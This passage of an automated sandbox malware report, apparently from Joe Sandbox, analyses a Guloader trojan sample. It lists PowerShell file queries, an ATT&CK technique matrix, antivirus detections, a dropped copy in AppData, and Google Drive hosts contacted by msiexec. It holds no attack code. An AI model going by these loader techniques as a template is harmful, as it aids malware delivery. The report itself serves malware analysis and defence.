      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00405D68 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405D68

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		311
      Process Injection      		1
      Masquerading      		OS Credential Dumping111
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell      		Logon Script (Windows)Logon Script (Windows)311
      Process Injection      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Software Packing      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials14
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      ro7eoySJ9q.exe61%ReversingLabsWin32.Trojan.Guloader
      ro7eoySJ9q.exe72%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe61%ReversingLabsWin32.Trojan.Guloader

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://apis.google.c0%Avira URL Cloudsafe
      https://drive.go0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		142.250.185.110
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.181.225
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.commsiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934010910.00000000094F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563221668.0000000009536000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806812480.000000000953B000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://drive.usercontent.google.com/)msiexec.exe, 00000006.00000003.3209397332.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330267381.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563255459.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3451513369.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2965886628.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2692845690.0000000005589000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198339130.000000000953B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563221668.0000000009536000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806812480.000000000953B000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2689252044.0000000004521000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://drive.google.com/Wmsiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://drive.google.com/msiexec.exe, 00000006.00000003.3451513369.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/powershell.exe, 00000002.00000002.2692845690.0000000005589000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2692845690.0000000005589000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.2692845690.0000000005589000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.2692845690.0000000005589000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://apis.google.cmsiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://drive.usercontent.google.com/msiexec.exe, 00000006.00000003.3209397332.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330267381.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563255459.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3451513369.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2965886628.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://apis.google.commsiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934010910.00000000094F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563221668.0000000009536000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806812480.000000000953B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://nsis.sf.net/NSIS_ErrorErrorro7eoySJ9q.exe, 00000000.00000000.2075821617.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ro7eoySJ9q.exe, 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                                                		high
                                                https://drive.google.com/gmsiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2965886628.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2689252044.0000000004521000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.gomsiexec.exe, 00000006.00000003.3330267381.00000000094FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      142.250.181.225
                                                      		drive.usercontent.google.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      142.250.185.110
                                                      		drive.google.comUnited States
                                                      		15169GOOGLEUSfalse

                                                      General Information

                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1588610
